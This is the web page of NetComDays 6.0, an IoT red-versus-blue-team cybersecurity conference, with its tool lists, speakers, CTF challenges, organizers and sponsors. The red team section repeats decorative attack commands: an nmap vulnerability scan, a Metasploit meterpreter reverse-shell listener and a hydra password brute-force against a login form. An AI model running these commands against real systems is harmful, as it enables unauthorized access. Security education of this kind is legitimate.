May 13-14, 2025

BLUE TEAM vs RED TEAMin the Age of IoT Security

Join us for NetComDays 6.0, where cybersecurity experts battle it out in the evolving landscape of IoT security. Witness the clash between offensive and defensive security strategies.

May 13-14, 2025
École Nationale des Sciences Appliquées, Khouribga
NetComDays 6.0 Logo

BLUE TEAM vs RED TEAM

In the age of IoT security, the battle between offensive and defensive security teams has never been more critical. Explore the tactics, tools, and strategies used by both sides.

Offensive Security

Red Teams simulate real-world attacks to identify vulnerabilities before malicious actors can exploit them. In the IoT landscape, this means testing everything from firmware to communication protocols.

Penetration Testing

Identifying and exploiting vulnerabilities in IoT systems

Exploit Development

Creating custom exploits for IoT-specific vulnerabilities

Wireless Attacks

Targeting wireless protocols used by IoT devices

Red Team Resources
Exploitation

Finding and leveraging vulnerabilities in IoT systems to gain unauthorized access.

Firmware Analysis

Reverse engineering IoT device firmware to discover hidden vulnerabilities.

Protocol Attacks

Targeting communication protocols like MQTT, CoAP, and Zigbee used in IoT ecosystems.

Cloud Pivoting

Using compromised IoT devices to pivot into cloud infrastructure and backend systems.

Offensive Security

Red Team Resources

Essential tools and resources for offensive security professionals working in IoT security

$ nmap -sV -p- --script vuln 192.168.1.1
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:F=Authentication failed"
$ nmap -sV -p- --script vuln 192.168.1.1
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:F=Authentication failed"
$ nmap -sV -p- --script vuln 192.168.1.1
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:F=Authentication failed"
$ nmap -sV -p- --script vuln 192.168.1.1
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:F=Authentication failed"
$ nmap -sV -p- --script vuln 192.168.1.1
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:F=Authentication failed"
$ nmap -sV -p- --script vuln 192.168.1.1
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 http-post-form "/login:username=^USER^&password=^PASS^:F=Authentication failed"
$ nmap -sV -p- --script vuln 192.168.1.1
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
$ sudo ./exploit[+] Payload sent[+] Waiting for shell...[+] Connection establishedroot@target:~# _01001000010000010100001101001011
SYSTEM COMPROMISED

Essential Tools & Resources

Equip yourself with the most effective offensive security tools

Penetration Testing Tools

Essential tools for identifying and exploiting vulnerabilities in IoT systems

Metasploit
Burp Suite
Wireshark
Nmap
Aircrack-ng
Firmware Analysis

Tools for reverse engineering IoT device firmware to discover vulnerabilities

Binwalk
Ghidra
IDA Pro
Radare2
Firmwalker
Wireless Hacking

Tools for analyzing and exploiting wireless protocols used by IoT devices

Bluetooth Analyzer
SDR Tools
Zigbee Sniffer
RF Analyzer
WiFi Pineapple
Exploit Development

Resources for creating custom exploits for IoT-specific vulnerabilities

PEDA
Exploit-DB
Python Exploit Dev
Immunity Debugger
GDB
Defensive Security

Blue Team Resources

Essential tools and resources for defensive security professionals protecting IoT infrastructure

[ALERT] Suspicious login attempt detected from 192.168.1.45 - Blocked
[INFO] Firewall rule updated: DENY tcp from any to 10.0.0.5 port 22 - Unauthorized SSH access attempt
[MONITOR] Network traffic analysis complete - 99.7% normal traffic patterns, 0.3% anomalies detected
[ALERT] Suspicious login attempt detected from 192.168.1.45 - Blocked
[INFO] Firewall rule updated: DENY tcp from any to 10.0.0.5 port 22 - Unauthorized SSH access attempt
[MONITOR] Network traffic analysis complete - 99.7% normal traffic patterns, 0.3% anomalies detected
[ALERT] Suspicious login attempt detected from 192.168.1.45 - Blocked
[INFO] Firewall rule updated: DENY tcp from any to 10.0.0.5 port 22 - Unauthorized SSH access attempt
[MONITOR] Network traffic analysis complete - 99.7% normal traffic patterns, 0.3% anomalies detected
[ALERT] Suspicious login attempt detected from 192.168.1.45 - Blocked
[INFO] Firewall rule updated: DENY tcp from any to 10.0.0.5 port 22 - Unauthorized SSH access attempt
[MONITOR] Network traffic analysis complete - 99.7% normal traffic patterns, 0.3% anomalies detected
[ALERT] Suspicious login attempt detected from 192.168.1.45 - Blocked
[INFO] Firewall rule updated: DENY tcp from any to 10.0.0.5 port 22 - Unauthorized SSH access attempt
[MONITOR] Network traffic analysis complete - 99.7% normal traffic patterns, 0.3% anomalies detected
[ALERT] Suspicious login attempt detected from 192.168.1.45 - Blocked
[INFO] Firewall rule updated: DENY tcp from any to 10.0.0.5 port 22 - Unauthorized SSH access attempt
[MONITOR] Network traffic analysis complete - 99.7% normal traffic patterns, 0.3% anomalies detected
[ALERT] Suspicious login attempt detected from 192.168.1.45 - Blocked
[INFO] Firewall rule updated: DENY tcp from any to 10.0.0.5 port 22 - Unauthorized SSH access attempt
SECURITY STATUS: ACTIVE!!
SECURITY PERIMETER ACTIVE

Essential Tools & Resources

Strengthen your defenses with these powerful security tools

Security Monitoring

Tools for continuous monitoring of IoT devices and networks to detect suspicious activities

Splunk
ELK Stack
Nagios
Prometheus
Grafana
Incident Response

Resources for rapidly responding to and mitigating security incidents in IoT environments

TheHive
MISP
DFIR ORC
GRR Rapid Response
Velociraptor
Network Security

Tools for securing IoT network communications and implementing proper segmentation

pfSense
Suricata
Zeek
Snort
OpenVAS
Vulnerability Management

Solutions for identifying, assessing, and remediating security vulnerabilities in IoT systems

Nessus
Qualys
Nexpose
Greenbone
Dependency-Track

Expert Speakers

Learn from industry-leading experts in both offensive and defensive security as they share insights on the latest IoT security challenges and solutions.

Blue Team
Faycal Belbachir

Faycal Belbachir

Expert cybersecurity consultant

Security Frameworks
Defensive Strategies
Red Team
Hamza Essad

Hamza Essad

Cybersecurity Engineer

IoT security
Web exploitatioon
Neutral
Mohssine Massaf

Mohssine Massaf

MVP Microsoft

Career Development
Networking Strategies
Blue Team
Abdessamad El Amrani

Abdessamad El Amrani

Cybersecurity Team Engineer

Threat Detection
Incident Response
Red Team
Souhail Mssassi

Souhail Mssassi

Senior Security Researcher

Privacy by Design
Secure IoT Ecosystems
Blue Team
Mohamed Wahbi

Mohamed Wahbi

Cybersecurity Consultant

Sharing experience
Red Team
Houssam-Eddine Ajaite

Houssam-Eddine Ajaite

Cybersecurity Consultant

Sharning experience
Red Team
Mehdi El Hadry

Mehdi El Hadry

Cybersecurity Engineer

Sharing experience
Capture The Flag

Test Your Skills

Put your IoT security skills to the test in our 24-hour Capture The Flag competition. Solve challenges, find vulnerabilities, and compete for prizes.

Competition Details

24-Hour Challenge

A full day of intense competition with challenges of varying difficulty

Team-Based Competition

Form teams of up to 4 members to tackle challenges collaboratively

Valuable Prizes

Win cash prizes, security hardware, and recognition in the security community

Event Status

Open for AllNo Payment Required
IoT Device Firmware Analysis
500 pts
Reverse Engineering
Hard

Extract and analyze the firmware of a simulated IoT device to find hidden backdoors.

Smart Home API Exploitation
300 pts
Web Security
Medium

Identify and exploit vulnerabilities in a smart home control API.

Ready to Test Your Skills?

Join the NetComDays 6.0 CTF competition and put your IoT security knowledge to the test. Whether you're a seasoned professional or just starting out, there are challenges for all skill levels.

Meet Our Team

The dedicated professionals behind NetComDays 6.0 who work tirelessly to create an exceptional cybersecurity event experience.

Page 1 of 2
Walid Dhimen - Event President

Walid Dhimen

Event President

Salma Farkh - Event Vice President

Salma Farkh

Event Vice President

Ayman Erroussi - Sponsorship Head

Ayman Erroussi

Sponsorship Head

Sami Boutouar - Sponsorship Vice

Sami Boutouar

Sponsorship Vice

Hiba El Mghari - Logistics Head

Hiba El Mghari

Logistics Head

Brahim Belayachi - Logistics Vice

Brahim Belayachi

Logistics Vice

Oussama Fannouch - Competition Head

Oussama Fannouch

Competition Head

Hamza Chaouki - Competition Vice

Hamza Chaouki

Competition Vice

Our Sponsors

NetComDays 6.0 is made possible by the generous support of our sponsors who are committed to advancing cybersecurity in the IoT space.

Cosumar

Cosumar

Sidi Ali

Sidi Ali

Lets Defend

Lets Defend

OCP

OCP

Hit Radio

Hit Radio

EKBAAL

EKBAAL

B-Secure

B-Secure

ISIC

ISIC

Become a Sponsor

Join these industry leaders in supporting NetComDays 6.0 and gain visibility with cybersecurity professionals, researchers, and decision-makers.